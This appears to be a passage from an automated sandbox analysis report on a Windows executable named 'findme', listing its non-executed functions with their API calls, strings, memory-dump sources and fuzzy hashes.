                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: b136ff1e04496b6e1000cee176936713aff27bfeb8c7b55c8b7ec3fa609a0d9a
                    • Instruction ID: 6b0d677f8777528f7d4154241348b85bf17273ea29b695128bb453e85adcd2a2
                    • Opcode Fuzzy Hash: b136ff1e04496b6e1000cee176936713aff27bfeb8c7b55c8b7ec3fa609a0d9a
                    • Instruction Fuzzy Hash: 19F0BE38146B00AFDB308E24C58CB93B7E4AB12325F048B2F80EB036E097686C4D8B08

                    Non-executed Functions

                    Function 004DB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004DB971
                    • EndDialog.USER32(?,00000006), ref: 004DB984
                    • GetDlgItem.USER32(?,0000006C), ref: 004DB9A0
                    • SetFocus.USER32(00000000), ref: 004DB9A7
                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 004DB9E1
                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004DBA18
                    • FindFirstFileW.KERNEL32(?,?), ref: 004DBA2E
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004DBA4C
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004DBA5C
                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004DBA78
                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004DBA94
                    • _swprintf.LIBCMT ref: 004DBAC4
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004DBAD7
                    • FindClose.KERNEL32(00000000), ref: 004DBADE
                    • _swprintf.LIBCMT ref: 004DBB37
                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 004DBB4A
                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004DBB67
                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 004DBB87
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004DBB97
                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004DBBB1
                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004DBBC9
                    • _swprintf.LIBCMT ref: 004DBBF5
                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004DBC08
                    • _swprintf.LIBCMT ref: 004DBC5C
                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 004DBC6F
                      • Part of subcall function 004DA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004DA662
                      • Part of subcall function 004DA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,004FE600,?,?), ref: 004DA6B1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                    • API String ID: 797121971-1840816070
                    • Opcode ID: 870569e7d77757acd03354b54adf1b75a8b095a0ef8bfce0f0ee9afae9c5bdeb
                    • Instruction ID: ba94604149845b44ea6cfe17b52545a68245bd2ea79edef203a4d66602dcebed
                    • Opcode Fuzzy Hash: 870569e7d77757acd03354b54adf1b75a8b095a0ef8bfce0f0ee9afae9c5bdeb
                    • Instruction Fuzzy Hash: 6091B1B2548348BBD6309BA0CD59FFB77ACEB8A704F00081BB749D2191DB78A605C776
                    Function 004C718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C7191
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004C72F1
                    • CloseHandle.KERNEL32(00000000), ref: 004C7301
                      • Part of subcall function 004C7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004C7C04
                      • Part of subcall function 004C7BF5: GetLastError.KERNEL32 ref: 004C7C4A
                      • Part of subcall function 004C7BF5: CloseHandle.KERNEL32(?), ref: 004C7C59
                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004C730C
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004C741A
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004C7446
                    • CloseHandle.KERNEL32(?), ref: 004C7457
                    • GetLastError.KERNEL32 ref: 004C7467
                    • RemoveDirectoryW.KERNEL32(?), ref: 004C74B3
                    • DeleteFileW.KERNEL32(?), ref: 004C74DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                    • API String ID: 3935142422-3508440684
                    • Opcode ID: 4f4846512dc743c1cf8d8d0f5b8dbd1cd111b6862ba24435ccef3695dc3b9ede
                    • Instruction ID: cf813975cce8c28d950e9ef5e558cd7081aeb48941fbea16e9e174f8d5a9b92d
                    • Opcode Fuzzy Hash: 4f4846512dc743c1cf8d8d0f5b8dbd1cd111b6862ba24435ccef3695dc3b9ede
                    • Instruction Fuzzy Hash: CAB1D375904215ABDB24DF65CC45FEF7B78AF04308F0440AEF945E7242DB38AA49CB69
                    Function 004C3281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog_memcmp
                    • String ID: CMT$h%u$hc%u
                    • API String ID: 3004599000-3282847064
                    • Opcode ID: 4f47afff9febda1f6ee6641f7202464cfbdd3a2ce3c7672a321a1d6b1494206c
                    • Instruction ID: 47927dbb53a0df05d0195bfac7180938ec847d7c54e731aca70fecd4eb88f675
                    • Opcode Fuzzy Hash: 4f47afff9febda1f6ee6641f7202464cfbdd3a2ce3c7672a321a1d6b1494206c
                    • Instruction Fuzzy Hash: 2732E4756102849FDF54DF24C885FEA37A5AF15304F04447FFD8A8B282DB78AA49CB68
                    Function 004ED00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 2b76928d8002313cb2283aed9d795bcf18699b243914a4bea8e7e37bcc458301
                    • Instruction ID: 8a42b5a48df6d0f931ad4824d22e2275f4401ff6f8e488fb686c13a618d344cd
                    • Opcode Fuzzy Hash: 2b76928d8002313cb2283aed9d795bcf18699b243914a4bea8e7e37bcc458301
                    • Instruction Fuzzy Hash: 39C24971E086688FDB25CE2ADD407EAB3B5EB44306F1541EBD84DE7240E778AE818F45
                    Function 004C27E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C27F1
                    • _strlen.LIBCMT ref: 004C2D7F
                      • Part of subcall function 004D137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004CB652,00000000,?,?,?,00010434), ref: 004D1396
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004C2EE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                    • String ID: CMT
                    • API String ID: 1706572503-2756464174
                    • Opcode ID: 12f1199886dea6b2374d13b9dc3ac88b405f6a51bb81349c8b469e57337c9603
                    • Instruction ID: 65dfe0605fe4b2a488cd6da29a0c016955eb434c072a4f1490e9e4dc421414a4
                    • Opcode Fuzzy Hash: 12f1199886dea6b2374d13b9dc3ac88b405f6a51bb81349c8b469e57337c9603
                    • Instruction Fuzzy Hash: 1062F3795002448FDF58DF25C985BEA3BE1AF54304F08457FEC9A8B382DBB8A945CB58
                    Function 004E866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004E8767
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004E8771
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 004E877E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: acecb563a20a17d8a264f0abee412df802528de6d60235d2c25085ff7e5d924f
                    • Instruction ID: 67395d7618bf5cd6ae20c397cdbd4ac2c631313a7317afbaec91e6caab76a150
                    • Opcode Fuzzy Hash: acecb563a20a17d8a264f0abee412df802528de6d60235d2c25085ff7e5d924f
                    • Instruction Fuzzy Hash: 2031D575901228ABCB21DF25DD88B9DBBB4AF08311F5041EAE80CA7250EB349B858F49
                    Function 004EAAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: b340032adaa40007183443a00a6d8679d0dd257aab0ad9c7cf835352c881aecf
                    • Instruction ID: 98df20a137a32824868d2a842d250d9b814b925888871a3c4ef88a2ae5035400
                    • Opcode Fuzzy Hash: b340032adaa40007183443a00a6d8679d0dd257aab0ad9c7cf835352c881aecf
                    • Instruction Fuzzy Hash: A7314671800289AFCB249E7ACC84EFB7BBDDB81314F0401AEF51887251D638AD54CB54
                    Function 004ECB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                    • Instruction ID: e2b928ea88b9fd69540999e773ba1d48d8a5ca898849991e2a7d6da8865ddbc9
                    • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                    • Instruction Fuzzy Hash: 64023D72E002599FDF14CFAAC8806AEBBF1EF48315F25416AD919E7384D735A942CB84
                    Function 004DA63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004DA662
                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,004FE600,?,?), ref: 004DA6B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FormatInfoLocaleNumber
                    • String ID:
                    • API String ID: 2169056816-0
                    • Opcode ID: 80f32fcb88dd9670e12944e6e5fffa5b68adbcc90eae612122c419bea6a10061
                    • Instruction ID: 5c95018a84770a19d439298f2ac2d775a2237c57ae3c9f08f0bf71aca5ec2a76
                    • Opcode Fuzzy Hash: 80f32fcb88dd9670e12944e6e5fffa5b68adbcc90eae612122c419bea6a10061
                    • Instruction Fuzzy Hash: 72015E36110208BAE7108FA5DC06FABB7BCEF59711F404426BA04D7160E3759E24C7E9
                    Function 004C6EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(004D117C,?,00000200), ref: 004C6EC9
                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 004C6EEA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 8190b31cdea8eec975488ba164cf08b9a16c31ae920a89c8dfb72f7badfa7f72
                    • Instruction ID: 14078ac10b19e9c3f0ac12dfa2ac49b65ff3f9d4c9d5e84f7134c34d9df7b16f
                    • Opcode Fuzzy Hash: 8190b31cdea8eec975488ba164cf08b9a16c31ae920a89c8dfb72f7badfa7f72
                    • Instruction Fuzzy Hash: EBD09E79284202BEEA510B748C05F277B546755B46F10C52AB256D90D4C9709025961E
                    Function 004F1194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004F118F,?,?,00000008,?,?,004F0E2F,00000000), ref: 004F13C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 5f48d5e2d7349beadf70e089691252264d9f393ce96db4923c9bf8b2a1972960
                    • Instruction ID: c7ea61fb9137c35b2dfbe0d5cd9d68761dafa7f8639a94a24cdaa6adef88fe72
                    • Opcode Fuzzy Hash: 5f48d5e2d7349beadf70e089691252264d9f393ce96db4923c9bf8b2a1972960
                    • Instruction Fuzzy Hash: AFB14B31610609DFD715CF28C48AB657BE0FF45364F25869AEA99CF2A1C339E982CB44
                    Function 004C407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: gj
                    • API String ID: 0-4203073231
                    • Opcode ID: 1895f051780e1880dd6956519d8c446a13fe83af4e4d3f9d7759545bddc485f5
                    • Instruction ID: 35d859896f296d763e10aa2078cc5a63a3329c1e3aefb0ea671e1ef45dc00e1c
                    • Opcode Fuzzy Hash: 1895f051780e1880dd6956519d8c446a13fe83af4e4d3f9d7759545bddc485f5
                    • Instruction Fuzzy Hash: F4F1C3B1A083418FD758CF29D880A2AFBE1BFCC208F15892EF598D7711E634E9558B56
                    Function 004CACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 004CAD1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Version
                    • String ID:
                    • API String ID: 1889659487-0
                    • Opcode ID: f458f145fbc31a36783f86e377ed97b3534d8cf30b4ba76f574b06e68abf53ca
                    • Instruction ID: 50f66f04cde513ec2042d962750fe50e1fdceae04edc3d98b5d850d98d5fe5f0
                    • Opcode Fuzzy Hash: f458f145fbc31a36783f86e377ed97b3534d8cf30b4ba76f574b06e68abf53ca
                    • Instruction Fuzzy Hash: BAF030B490021C8FC728CF18EC41BEA73B6F758715F2002AAD916537A4D774AD54DF5A
                    Function 004DF063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,004DEAC5), ref: 004DF068
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 2cfd69933069bdfcb1850cbc962f89a9a74a880bda7fb19a2ab37fe6981c2f0e
                    • Instruction ID: 6c5cd00f71a5bade8782a2643f68fb2201466e6dcfbcca64e5fdeca50d7cd7d7
                    • Opcode Fuzzy Hash: 2cfd69933069bdfcb1850cbc962f89a9a74a880bda7fb19a2ab37fe6981c2f0e
                    • Instruction Fuzzy Hash:
                    Function 004EB710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 3a0cc918b9cbb145531708c7db8467a68b97644c0aca6344368326e3cc3fd2fc
                    • Instruction ID: c033a68d728d50e90cc0facd0a6dcdeca0c015135da198049e3e42c30b9b994f
                    • Opcode Fuzzy Hash: 3a0cc918b9cbb145531708c7db8467a68b97644c0aca6344368326e3cc3fd2fc
                    • Instruction Fuzzy Hash: D2A011B02022008B83008FB2AA0820E3AAAAA222823088228A008C2020EA208020AF08
                    Function 004D5C77 Relevance: .8, Instructions: 800COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
